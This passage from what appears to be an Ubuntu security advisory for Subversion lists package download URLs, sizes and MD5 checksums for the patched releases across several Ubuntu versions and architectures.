Size/MD5: 576230 d849b9b619f42282b1f50614e4e46623 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/python-subversion_1.3.1-3ubuntu1.2_powerpc.deb Size/MD5: 474048 195bd0ada5a394564834fbc699ec975c http://security.ubuntu.com/ubuntu/pool/main/s/subversion/subversion_1.3.1-3ubuntu1.2_powerpc.deb Size/MD5: 217388 891fde7097b69147a312e08b81ea247a sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libapache2-svn_1.3.1-3ubuntu1.2_sparc.deb Size/MD5: 115114 1ed660b3b9b72d0844ef0873fd6a4fdb http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn-core-perl_1.3.1-3ubuntu1.2_sparc.deb Size/MD5: 741336 a11fff889c27cefd2b7bbf64f9b8c98f http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn-javahl_1.3.1-3ubuntu1.2_sparc.deb Size/MD5: 187406 daf0411d3b2416cda3233be355b6f491 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn-ruby1.8_1.3.1-3ubuntu1.2_sparc.deb Size/MD5: 287974 313c148b1cc9ac671464d8b27ef5f190 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn0-dev_1.3.1-3ubuntu1.2_sparc.deb Size/MD5: 764382 9d3751c61db70d552b72f8cce2119147 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn0_1.3.1-3ubuntu1.2_sparc.deb Size/MD5: 517078 67d0754aae22a021f9b180a910cadc51 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/python-subversion_1.3.1-3ubuntu1.2_sparc.deb Size/MD5: 445574 0ef53b8737e0d3603a9e9f8e5ec63b4b http://security.ubuntu.com/ubuntu/pool/main/s/subversion/subversion_1.3.1-3ubuntu1.2_sparc.deb Size/MD5: 202738 ee04a722dd5efd8c065b7703a4914857 Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/s/subversion/subversion_1.4.6dfsg1-2ubuntu1.1.diff.gz Size/MD5: 91231 66fc3b7b5aced6e7382103b0668c6ba4 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/subversion_1.4.6dfsg1-2ubuntu1.1.dsc Size/MD5: 1561 654d55bce757163f9d6fe7e00f33365b http://security.ubuntu.com/ubuntu/pool/main/s/subversion/subversion_1.4.6dfsg1.orig.tar.gz Size/MD5: 6474068 46e26d9499ad482e0d65131a6228ffe1 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn-doc_1.4.6dfsg1-2ubuntu1.1_all.deb Size/MD5: 1132186 094ed47907eb6ebaba0bcb832619b620 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn-javahl_1.4.6dfsg1-2ubuntu1.1_all.deb Size/MD5: 818 5e483a35f2ec6610f5e82697c7edc5bd http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn-ruby_1.4.6dfsg1-2ubuntu1.1_all.deb Size/MD5: 790 fa41a9adac9ae84a969bca6a9cdc5132 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/subversion-tools_1.4.6dfsg1-2ubuntu1.1_all.deb Size/MD5: 172170 a0b914b04aafb06a5801a50d39cc6699 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libapache2-svn_1.4.6dfsg1-2ubuntu1.1_amd64.deb Size/MD5: 141736 70a325c6246b1593a3ab36bc44073ffa http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn-dev_1.4.6dfsg1-2ubuntu1.1_amd64.deb Size/MD5: 930124 62f1b992cef1e1e69f332931511f58eb http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn-java_1.4.6dfsg1-2ubuntu1.1_amd64.deb Size/MD5: 219696 6658d62c85cf3f27816fbc332ccbfe28 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn-perl_1.4.6dfsg1-2ubuntu1.1_amd64.deb Size/MD5: 858802 8ed8cb2581db530f20d2d67c57af1269 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn-ruby1.8_1.4.6dfsg1-2ubuntu1.1_amd64.deb Size/MD5: 448444 3bdd1b6a9e249dfc295f0dc7abd0fd02 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn1_1.4.6dfsg1-2ubuntu1.1_amd64.deb Size/MD5: 649238 be75d805b0f8b17c4b748fb57e0cfab3 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/python-subversion-dbg_1.4.6dfsg1-2ubuntu1.1_amd64.deb Size/MD5: 3781628 b386a7efc82f369adfcc393b321ef327 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/python-subversion_1.4.6dfsg1-2ubuntu1.1_amd64.deb Size/MD5: 1111148 5a159a9fd2520876af8e3f3b464e0a30 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/subversion_1.4.6dfsg1-2ubuntu1.1_amd64.deb Size/MD5: 254590 f13795a563277606ff2b756f3d488bf1 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libapache2-svn_1.4.6dfsg1-2ubuntu1.1_i386.deb Size/MD5: 137188 6fd6954e7c6e29b56d286e95f28ded0f http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn-dev_1.4.6dfsg1-2ubuntu1.1_i386.deb Size/MD5: 825352 f63187450d1d1f87d246491692687f30 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn-java_1.4.6dfsg1-2ubuntu1.1_i386.deb Size/MD5: 216422 217521a0e543760cc1ac8f78badd67b6 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn-perl_1.4.6dfsg1-2ubuntu1.1_i386.deb Size/MD5: 799500 e0cdc6b48ce9c6e7aa6f4ef2e92e1f85 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn-ruby1.8_1.4.6dfsg1-2ubuntu1.1_i386.deb Size/MD5: 381704 5dce4cfe21efe992d430ab9f1747e1ff http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn1_1.4.6dfsg1-2ubuntu1.1_i386.deb Size/MD5: 594706 e67cf26d746619559cbf7d8b69a1e685 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/python-subversion-dbg_1.4.6dfsg1-2ubuntu1.1_i386.deb Size/MD5: 3371150 83e7d11f8897464e68a693a94737428d http://security.ubuntu.com/ubuntu/pool/main/s/subversion/python-subversion_1.4.6dfsg1-2ubuntu1.1_i386.deb Size/MD5: 945074 2928e23be0a9d535e0585b85c427d5b0 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/subversion_1.4.6dfsg1-2ubuntu1.1_i386.deb Size/MD5: 243066 2d20b988146fddcf287c1bbe23ea21d5 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/s/subversion/libapache2-svn_1.4.6dfsg1-2ubuntu1.1_lpia.deb Size/MD5: 135890 25a63fcb2bb6ff8d418d93a33d97a297 http://ports.ubuntu.com/pool/main/s/subversion/libsvn-dev_1.4.6dfsg1-2ubuntu1.1_lpia.deb Size/MD5: 813768 ad739edf171fbf686592d8667241a12f http://ports.ubuntu.com/pool/main/s/subversion/libsvn-java_1.4.6dfsg1-2ubuntu1.1_lpia.deb Size/MD5: 218358 342fe6d04023213119f69b47c64139c1 http://ports.ubuntu.com/pool/main/s/subversion/libsvn-perl_1.4.6dfsg1-2ubuntu1.1_lpia.deb Size/MD5: 796458 06cdcded251196a8140ddb6060199e9d http://ports.ubuntu.com/pool/main/s/subversion/libsvn-ruby1.8_1.4.6dfsg1-2ubuntu1.1_lpia.deb Size/MD5: 380656 1fa6df5bc65e696b980c7fdad71797ab http://ports.ubuntu.com/pool/main/s/subversion/libsvn1_1.4.6dfsg1-2ubuntu1.1_lpia.deb Size/MD5: 576518 15117ebd6428ad14e44fae5ebc4bb8ef http://ports.ubuntu.com/pool/main/s/subversion/python-subversion-dbg_1.4.6dfsg1-2ubuntu1.1_lpia.deb Size/MD5: 3394096 340d446ba58f771e1793ccdaed5f7844 http://ports.ubuntu.com/pool/main/s/subversion/python-subversion_1.4.6dfsg1-2ubuntu1.1_lpia.deb Size/MD5: 922298 c631b1ba82f5bfc916f11cb64cec3fb0 http://ports.ubuntu.com/pool/main/s/subversion/subversion_1.4.6dfsg1-2ubuntu1.1_lpia.deb Size/MD5: 241048 34186604366169f1ee8a6afb2820932e powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/s/subversion/libapache2-svn_1.4.6dfsg1-2ubuntu1.1_powerpc.deb Size/MD5: 147116 f92d6cf33defae5bf0c742c2eeda305b http://ports.ubuntu.com/pool/main/s/subversion/libsvn-dev_1.4.6dfsg1-2ubuntu1.1_powerpc.deb Size/MD5: 929798 c14eefc2a6083b59cc1fe0d6da2ec7f1 http://ports.ubuntu.com/pool/main/s/subversion/libsvn-java_1.4.6dfsg1-2ubuntu1.1_powerpc.deb Size/MD5: 223182 49f30e4636f3fe6b34277fd5b8af4448 http://ports.ubuntu.com/pool/main/s/subversion/libsvn-perl_1.4.6dfsg1-2ubuntu1.1_powerpc.deb Size/MD5: 870140 fc4e70e8a290b0638e0650107ced912d http://ports.ubuntu.com/pool/main/s/subversion/libsvn-ruby1.8_1.4.6dfsg1-2ubuntu1.1_powerpc.deb Size/MD5: 436194 13023b522e3beb1ec47445be14d81db4 http://ports.ubuntu.com/pool/main/s/subversion/libsvn1_1.4.6dfsg1-2ubuntu1.1_powerpc.deb Size/MD5: 673216 e2dea9beb613ca7ed6d631f625a6406a http://ports.ubuntu.com/pool/main/s/subversion/python-subversion-dbg_1.4.6dfsg1-2ubuntu1.1_powerpc.deb Size/MD5: 3596430 7760cb9d9113bad8260758905419768e http://ports.ubuntu.com/pool/main/s/subversion/python-subversion_1.4.6dfsg1-2ubuntu1.1_powerpc.deb Size/MD5: 1030754 fef9d1e6f77c246ee4d993b2cd8f014f http://ports.ubuntu.com/pool/main/s/subversion/subversion_1.4.6dfsg1-2ubuntu1.1_powerpc.deb Size/MD5: 272336 d0d1b7b9e083e7a47e97ce34c97d7106 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/s/subversion/libapache2-svn_1.4.6dfsg1-2ubuntu1.1_sparc.deb Size/MD5: 136998 19e99abdcf08e3803e1393a58cafc76f http://ports.ubuntu.com/pool/main/s/subversion/libsvn-dev_1.4.6dfsg1-2ubuntu1.1_sparc.deb Size/MD5: 835290 e2118a3213d9f22239688c95ceb82d6c http://ports.ubuntu.com/pool/main/s/subversion/libsvn-java_1.4.6dfsg1-2ubuntu1.1_sparc.deb Size/MD5: 211996 80fe7cdc1c37f2f84f38f11e35873325 http://ports.ubuntu.com/pool/main/s/subversion/libsvn-perl_1.4.6dfsg1-2ubuntu1.1_sparc.deb Size/MD5: 830626 9ced4d5ca4dfcb524264832767fe4abc http://ports.ubuntu.com/pool/main/s/subversion/libsvn-ruby1.8_1.4.6dfsg1-2ubuntu1.1_sparc.deb Size/MD5: 394082 efc83b6e8cbd71c2accdb6a3ba016c01 http://ports.ubuntu.com/pool/main/s/subversion/libsvn1_1.4.6dfsg1-2ubuntu1.1_sparc.deb Size/MD5: 563760 d1b616042847c9c9124e59008d451154 http://ports.ubuntu.com/pool/main/s/subversion/python-subversion-dbg_1.4.6dfsg1-2ubuntu1.1_sparc.deb Size/MD5: 3366342 90f28a3d1113f43e83a73085c01e5245 http://ports.ubuntu.com/pool/main/s/subversion/python-subversion_1.4.6dfsg1-2ubuntu1.1_sparc.deb Size/MD5: 952730 6188acb169f066e1605f0bdb64e1de63 http://ports.ubuntu.com/pool/main/s/subversion/subversion_1.4.6dfsg1-2ubuntu1.1_sparc.deb Size/MD5: 243124 29d8ba109a06491671187e7805b4d308 Updated packages for Ubuntu 8.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/s/subversion/subversion_1.5.1dfsg1-1ubuntu2.1.diff.gz Size/MD5: 96024 8762977b9d91c6808720def8240c3bbb http://security.ubuntu.com/ubuntu/pool/main/s/subversion/subversion_1.5.1dfsg1-1ubuntu2.1.dsc Size/MD5: 2019 caafb656721e62c5a99dec116e2cfced http://security.ubuntu.com/ubuntu/pool/main/s/subversion/subversion_1.5.1dfsg1.orig.tar.gz Size/MD5: 6805740 09a95bbc203ec516db796bd40d612403 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn-doc_1.5.1dfsg1-1ubuntu2.1_all.deb Size/MD5: 1859740 27400051070b3f7e765a94e177efbd7b http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn-ruby_1.5.1dfsg1-1ubuntu2.1_all.deb Size/MD5: 812 1044bbbc66b120efb506655c6a102bb9 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/subversion-tools_1.5.1dfsg1-1ubuntu2.1_all.deb Size/MD5: 183272 1f1f9bbd848ae38f26ea759111c83a9b amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libapache2-svn_1.5.1dfsg1-1ubuntu2.1_amd64.deb Size/MD5: 151728 e850712b0a729f0b5a992c3b9308cabe http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn-dev_1.5.1dfsg1-1ubuntu2.1_amd64.deb Size/MD5: 1140244 3e9ab2a7955ab2920d15e1c03041eabb http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn-java_1.5.1dfsg1-1ubuntu2.1_amd64.deb Size/MD5: 281872 ec7aa6b3ac6002d5cb15174281e8b43b http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn-perl_1.5.1dfsg1-1ubuntu2.1_amd64.deb Size/MD5: 1084042 2dec6bd6bcd110027592df078384bba0 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn-ruby1.8_1.5.1dfsg1-1ubuntu2.1_amd64.deb Size/MD5: 563898 5d9d84def30acaea5bf6f817ad2fd2a2 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn1_1.5.1dfsg1-1ubuntu2.1_amd64.deb Size/MD5: 791842 a6e9450b81fe33e444cf42e1da5341cc http://security.ubuntu.com/ubuntu/pool/main/s/subversion/python-subversion-dbg_1.5.1dfsg1-1ubuntu2.1_amd64.deb Size/MD5: 4048126 0681ef8d314fe431104ae74bb6796d16 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/python-subversion_1.5.1dfsg1-1ubuntu2.1_amd64.deb Size/MD5: 1228004 c61584e3ee7563cbdc32b39fb0da7a58 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/subversion_1.5.1dfsg1-1ubuntu2.1_amd64.deb Size/MD5: 350994 40b152f1cccfb010ce1dd19a70486f00 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libapache2-svn_1.5.1dfsg1-1ubuntu2.1_i386.deb Size/MD5: 147422 e6321b1771a19165857d819bdbe192ff http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn-dev_1.5.1dfsg1-1ubuntu2.1_i386.deb Size/MD5: 1017194 9a073fb2da4d6d62309dfcdda4a23391 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn-java_1.5.1dfsg1-1ubuntu2.1_i386.deb Size/MD5: 279362 657fe63493529548da7347e7d9c68279 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn-perl_1.5.1dfsg1-1ubuntu2.1_i386.deb Size/MD5: 1035162 99726a6285643181569289ea6e0dd502 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn-ruby1.8_1.5.1dfsg1-1ubuntu2.1_i386.deb Size/MD5: 481314 d29f6a487df1847ca1653d9b24d16aa9 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn1_1.5.1dfsg1-1ubuntu2.1_i386.deb Size/MD5: 730778 7018759f6b8f94a8ce7d25f55483255f http://security.ubuntu.com/ubuntu/pool/main/s/subversion/python-subversion-dbg_1.5.1dfsg1-1ubuntu2.1_i386.deb Size/MD5: 3655612 1b023278b7b95edbd0feff9372afe706 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/python-subversion_1.5.1dfsg1-1ubuntu2.1_i386.deb Size/MD5: 1029008 24b69bbbd1b483dbcd6b3518c9a54ecd http://security.ubuntu.com/ubuntu/pool/main/s/subversion/subversion_1.5.1dfsg1-1ubuntu2.1_i386.deb Size/MD5: 338110 034f6f2569e7f58107e65dd86d2ff058 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/s/subversion/libapache2-svn_1.5.1dfsg1-1ubuntu2.1_lpia.deb Size/MD5: 146036 64fdde200ddd38c0a72d5e095673aafa http://ports.ubuntu.com/pool/main/s/subversion/libsvn-dev_1.5.1dfsg1-1ubuntu2.1_lpia.deb Size/MD5: 1001944 07dd2115f710d26a3b01a9e5cad4877e http://ports.ubuntu.com/pool/main/s/subversion/libsvn-java_1.5.1dfsg1-1ubuntu2.1_lpia.deb Size/MD5: 281730 c64f16ad9113f3e80c082a76a40cdc19 http://ports.ubuntu.com/pool/main/s/subversion/libsvn-perl_1.5.1dfsg1-1ubuntu2.1_lpia.deb Size/MD5: 1028970 be8df75b41896f031d2f8417050d9db3 http://ports.ubuntu.com/pool/main/s/subversion/libsvn-ruby1.8_1.5.1dfsg1-1ubuntu2.1_lpia.deb Size/MD5: 481298 56a20318e6c310a1c39309f7a0279d23 http://ports.ubuntu.com/pool/main/s/subversion/libsvn1_1.5.1dfsg1-1ubuntu2.1_lpia.deb Size/MD5: 705870 16eccb7728c2e86751a9ce97a07c6b7b http://ports.ubuntu.com/pool/main/s/subversion/python-subversion-dbg_1.5.1dfsg1-1ubuntu2.1_lpia.deb Size/MD5: 3694458 f938861537fbe29193361158bbadb677 http://ports.ubuntu.com/pool/main/s/subversion/python-subversion_1.5.1dfsg1-1ubuntu2.1_lpia.deb Size/MD5: 1011940 e88535d3509a36e66325025a5bc9844f http://ports.ubuntu.com/pool/main/s/subversion/subversion_1.5.1dfsg1-1ubuntu2.1_lpia.deb Size/MD5: 335328 4a290c2bdd933671b28c4dd4f9a2f73e powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/s/subversion/libapache2-svn_1.5.1dfsg1-1ubuntu2.1_powerpc.deb Size/MD5: 157040 1d322b6de1d7c357f9eadfc578a5e9bf http://ports.ubuntu.com/pool/main/s/subversion/libsvn-dev_1.5.1dfsg1-1ubuntu2.1_powerpc.deb Size/MD5: 1137534 b0e1422642c8610e232cb6fee6220d00 http://ports.ubuntu.com/pool/main/s/subversion/libsvn-java_1.5.1dfsg1-1ubuntu2.1_powerpc.deb Size/MD5: 287350 3b7c904b047b13a7d198e3bc7aaee992 http://ports.ubuntu.com/pool/main/s/subversion/libsvn-perl_1.5.1dfsg1-1ubuntu2.1_powerpc.deb Size/MD5: 1125598 7bde216ad288a534e4c21f5afca6d550 http://ports.ubuntu.com/pool/main/s/subversion/libsvn-ruby1.8_1.5.1dfsg1-1ubuntu2.1_powerpc.deb Size/MD5: 544440 6fc92f687bf2cd07afe8af4ab8e89e3c http://ports.ubuntu.com/pool/main/s/subversion/libsvn1_1.5.1dfsg1-1ubuntu2.1_powerpc.deb Size/MD5: 815920 c65b080b33451a750d686c95550f2cce http://ports.ubuntu.com/pool/main/s/subversion/python-subversion-dbg_1.5.1dfsg1-1ubuntu2.1_powerpc.deb Size/MD5: 4198170 4203dc2a230d686a6813de3ba665a6dd http://ports.ubuntu.com/pool/main/s/subversion/python-subversion_1.5.1dfsg1-1ubuntu2.1_powerpc.deb Size/MD5: 1140138 7cda60d7b156512f867593eacba34dab http://ports.ubuntu.com/pool/main/s/subversion/subversion_1.5.1dfsg1-1ubuntu2.1_powerpc.deb Size/MD5: 366550 d7d44f698673e68501c573704d5b1338 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/s/subversion/libapache2-svn_1.5.1dfsg1-1ubuntu2.1_sparc.deb Size/MD5: 146924 542b1f436d69d16711e23eb131c0d3a3 http://ports.ubuntu.com/pool/main/s/subversion/libsvn-dev_1.5.1dfsg1-1ubuntu2.1_sparc.deb Size/MD5: 1019986 1aa63715db98087575e949403888ecc8 http://ports.ubuntu.com/pool/main/s/subversion/libsvn-java_1.5.1dfsg1-1ubuntu2.1_sparc.deb Size/MD5: 274320 ea445ec9a505954086be4ec3522376ea http://ports.ubuntu.com/pool/main/s/subversion/libsvn-perl_1.5.1dfsg1-1ubuntu2.1_sparc.deb Size/MD5: 1075958 2504ed4e91b639620e74fb9d2a4d2f7a http://ports.ubuntu.com/pool/main/s/subversion/libsvn-ruby1.8_1.5.1dfsg1-1ubuntu2.1_sparc.deb Size/MD5: 493412 a5f7150c47c9bb2950bd82981d72ba99 http://ports.ubuntu.com/pool/main/s/subversion/libsvn1_1.5.1dfsg1-1ubuntu2.1_sparc.deb Size/MD5: 683544 32463c0e7f60245b044c97e5f021db88 http://ports.ubuntu.com/pool/main/s/subversion/python-subversion-dbg_1.5.1dfsg1-1ubuntu2.1_sparc.deb Size/MD5: 3665920 d8e773ffaed3ea7069124849c44976dc http://ports.ubuntu.com/pool/main/s/subversion/python-subversion_1.5.1dfsg1-1ubuntu2.1_sparc.deb Size/MD5: 1026144 3d815d515bad0ff914bfc7e470c50516 http://ports.ubuntu.com/pool/main/s/subversion/subversion_1.5.1dfsg1-1ubuntu2.1_sparc.deb Size/MD5: 338008 8c3553dd4a35d9d58c3d3b9e9279f405 Updated packages for Ubuntu 9.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/s/subversion/subversion_1.5.4dfsg1-1ubuntu2.1.diff.gz Size/MD5: 90465 78000472cc72b41ff1189ea024f57457 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/subversion_1.5.4dfsg1-1ubuntu2.1.dsc Size/MD5: 2014 27bcb93e715af822594e8d3e87badd4e http://security.ubuntu.com/ubuntu/pool/main/s/subversion/subversion_1.5.4dfsg1.orig.tar.gz Size/MD5: 6842591 3e462485ead922a61f8be2f038f4e55e Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn-doc_1.5.4dfsg1-1ubuntu2.1_all.deb Size/MD5: 1866158 6bfe5169dcb3c85c8bd7bbd101032bda http://security.ubuntu.com/ubuntu/pool/main/s/subversion/subversion-tools_1.5.4dfsg1-1ubuntu2.1_all.deb Size/MD5: 184024 b8262767ee1c6d91983d029ac4ee17a6 http://security.ubuntu.com/ubuntu/pool/universe/s/subversion/libsvn-ruby_1.5.4dfsg1-1ubuntu2.1_all.deb Size/MD5: 810 90cac7b2433005637e95c2bb2538fe30 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn-dev_1.5.4dfsg1-1ubuntu2.1_amd64.deb Size/MD5: 1143388 84c41831b7037890606bd8df702f3b95 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn-perl_1.5.4dfsg1-1ubuntu2.1_amd64.deb Size/MD5: 1091688 6adb8a8bea21aa1650e3a8a0ba82e036 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn1_1.5.4dfsg1-1ubuntu2.1_amd64.deb Size/MD5: 794982 6ded813106e855766d54c3b4e2aedb2d http://security.ubuntu.com/ubuntu/pool/main/s/subversion/python-subversion-dbg_1.5.4dfsg1-1ubuntu2.1_amd64.deb Size/MD5: 4052788 b89b15718020ce8f3a2638c9c8a91ef6 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/python-subversion_1.5.4dfsg1-1ubuntu2.1_amd64.deb Size/MD5: 1224572 9f49d481aa926ebc1c0a3a45a635d25f http://security.ubuntu.com/ubuntu/pool/main/s/subversion/subversion_1.5.4dfsg1-1ubuntu2.1_amd64.deb Size/MD5: 352832 5f1e18a34520a84f2fb70310666b1111 http://security.ubuntu.com/ubuntu/pool/universe/s/subversion/libapache2-svn_1.5.4dfsg1-1ubuntu2.1_amd64.deb Size/MD5: 152810 e931c10d8989688e18b83901d925ed89 http://security.ubuntu.com/ubuntu/pool/universe/s/subversion/libsvn-java_1.5.4dfsg1-1ubuntu2.1_amd64.deb Size/MD5: 283064 1cf10c871cf34bf9c3f474655fc464d1 http://security.ubuntu.com/ubuntu/pool/universe/s/subversion/libsvn-ruby1.8_1.5.4dfsg1-1ubuntu2.1_amd64.deb Size/MD5: 564918 c86f9eb86deff2cbfd3bc17457d477e7 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn-dev_1.5.4dfsg1-1ubuntu2.1_i386.deb Size/MD5: 1020182 997300aba35fc3ff1a59b7f15d6403e9 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn-perl_1.5.4dfsg1-1ubuntu2.1_i386.deb Size/MD5: 1037734 e12880024c1bdfb4d2626d75c9d16517 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn1_1.5.4dfsg1-1ubuntu2.1_i386.deb Size/MD5: 734110 74b185a0f689e4ee383025eed8e01929 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/python-subversion-dbg_1.5.4dfsg1-1ubuntu2.1_i386.deb Size/MD5: 3660726 c764dfc74c427f539654f15980ff28c7 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/python-subversion_1.5.4dfsg1-1ubuntu2.1_i386.deb Size/MD5: 1027238 38e5c34f7a954ba6646c810f0ec144c7 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/subversion_1.5.4dfsg1-1ubuntu2.1_i386.deb Size/MD5: 340142 299527c96bbde747a57f74cdafefccde http://security.ubuntu.com/ubuntu/pool/universe/s/subversion/libapache2-svn_1.5.4dfsg1-1ubuntu2.1_i386.deb Size/MD5: 148386 0b3ad4deab5b95bee7a13bc57db380b4 http://security.ubuntu.com/ubuntu/pool/universe/s/subversion/libsvn-java_1.5.4dfsg1-1ubuntu2.1_i386.deb Size/MD5: 280528 2caa5be97d999e6c1a5431ae754b91aa http://security.ubuntu.com/ubuntu/pool/universe/s/subversion/libsvn-ruby1.8_1.5.4dfsg1-1ubuntu2.1_i386.deb Size/MD5: 481668 98dd240bde58bd28062e626044c45f6b lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/s/subversion/libsvn-dev_1.5.4dfsg1-1ubuntu2.1_lpia.deb Size/MD5: 1004802 4390a95ed34c0a7e38c25e2d779c1d4f http://ports.ubuntu.com/pool/main/s/subversion/libsvn-perl_1.5.4dfsg1-1ubuntu2.1_lpia.deb Size/MD5: 1031740 106365171fcf745297cbe2620a5f1c38 http://ports.ubuntu.com/pool/main/s/subversion/libsvn1_1.5.4dfsg1-1ubuntu2.1_lpia.deb Size/MD5: 708558 4bbf84de1f64e12df676a52555a21106 http://ports.ubuntu.com/pool/main/s/subversion/python-subversion-dbg_1.5.4dfsg1-1ubuntu2.1_lpia.deb Size/MD5: 3697622 addce882213a318b1cee2671aacea682 http://ports.ubuntu.com/pool/main/s/subversion/python-subversion_1.5.4dfsg1-1ubuntu2.1_lpia.deb Size/MD5: 1009604 4ace133c89506de608ac3768a9846687 http://ports.ubuntu.com/pool/main/s/subversion/subversion_1.5.4dfsg1-1ubuntu2.1_lpia.deb Size/MD5: 337348 01374ddfae22db8f030bf328ce2f549a http://ports.ubuntu.com/pool/universe/s/subversion/libapache2-svn_1.5.4dfsg1-1ubuntu2.1_lpia.deb Size/MD5: 147074 aac1ed98eb3bf4884bc046d603e8e412 http://ports.ubuntu.com/pool/universe/s/subversion/libsvn-java_1.5.4dfsg1-1ubuntu2.1_lpia.deb Size/MD5: 282920 f68b87d20d816684d0fb3bafc405bdbb http://ports.ubuntu.com/pool/universe/s/subversion/libsvn-ruby1.8_1.5.4dfsg1-1ubuntu2.1_lpia.deb Size/MD5: 482050 0b233faaa12b1cbbdf424e0ad08cc04f powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/s/subversion/libsvn-dev_1.5.4dfsg1-1ubuntu2.1_powerpc.deb Size/MD5: 1140566 e61c29295750d964ab460d1036c06a19 http://ports.ubuntu.com/pool/main/s/subversion/libsvn-perl_1.5.4dfsg1-1ubuntu2.1_powerpc.deb Size/MD5: 1128418 4dc4c6047e9a8bc51e15dd80bb568feb http://ports.ubuntu.com/pool/main/s/subversion/libsvn1_1.5.4dfsg1-1ubuntu2.1_powerpc.deb Size/MD5: 819238 8b5cf0b22441727fa8568163acfc7237 http://ports.ubuntu.com/pool/main/s/subversion/python-subversion-dbg_1.5.4dfsg1-1ubuntu2.1_powerpc.deb Size/MD5: 4197106 d6377f73cbfca2a5813d6bec09f7b4a7 http://ports.ubuntu.com/pool/main/s/subversion/python-subversion_1.5.4dfsg1-1ubuntu2.1_powerpc.deb Size/MD5: 1136490 2b4a45078b89e06ff8883741568ab507 http://ports.ubuntu.com/pool/main/s/subversion/subversion_1.5.4dfsg1-1ubuntu2.1_powerpc.deb Size/MD5: 368050 b843422391bc12261a402e0eb330a77a http://ports.ubuntu.com/pool/universe/s/subversion/libapache2-svn_1.5.4dfsg1-1ubuntu2.1_powerpc.deb Size/MD5: 158054 a63d8ab52b4dcb375529b266cb6c6f16 http://ports.ubuntu.com/pool/universe/s/subversion/libsvn-java_1.5.4dfsg1-1ubuntu2.1_powerpc.deb Size/MD5: 288550 95544f41dab1a1c889c556e6573204a8 http://ports.ubuntu.com/pool/universe/s/subversion/libsvn-ruby1.8_1.5.4dfsg1-1ubuntu2.1_powerpc.deb Size/MD5: 545342 a9bb0cd6cf5329e1bf67dbb8068af761 sparc architecture (Sun SPARC/UltraSPARC): 